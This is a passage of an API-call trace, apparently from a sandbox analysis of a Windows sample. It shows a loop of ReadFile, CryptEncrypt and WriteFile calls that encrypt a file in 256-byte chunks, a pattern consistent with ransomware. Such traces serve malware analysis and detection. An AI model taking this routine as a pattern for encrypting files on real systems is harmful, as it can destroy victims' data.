lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.573] GetLastError () returned 0x0 [0144.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.573] GetLastError () returned 0x0 [0144.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.573] GetLastError () returned 0x0 [0144.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.573] GetLastError () returned 0x0 [0144.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.574] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.574] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.574] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.574] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.574] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.574] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.574] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.574] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.574] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.574] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.574] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.574] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.574] GetLastError () returned 0x0 [0144.574] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.575] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.575] GetLastError () returned 0x0 [0144.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.575] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.575] GetLastError () returned 0x0 [0144.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.575] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.575] GetLastError () returned 0x0 [0144.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.575] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.575] GetLastError () returned 0x0 [0144.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.575] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.575] GetLastError () returned 0x0 [0144.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.575] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.575] GetLastError () returned 0x0 [0144.575] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.575] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.576] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.576] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.576] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.576] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.576] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.576] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.576] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.576] GetLastError () returned 0x0 [0144.576] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.577] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.577] GetLastError () returned 0x0 [0144.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.577] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.577] GetLastError () returned 0x0 [0144.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.577] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.577] GetLastError () returned 0x0 [0144.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.577] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.577] GetLastError () returned 0x0 [0144.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.577] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.577] GetLastError () returned 0x0 [0144.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.577] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.577] GetLastError () returned 0x0 [0144.577] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.577] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.578] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.578] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.578] GetLastError () returned 0x0 [0144.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.578] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 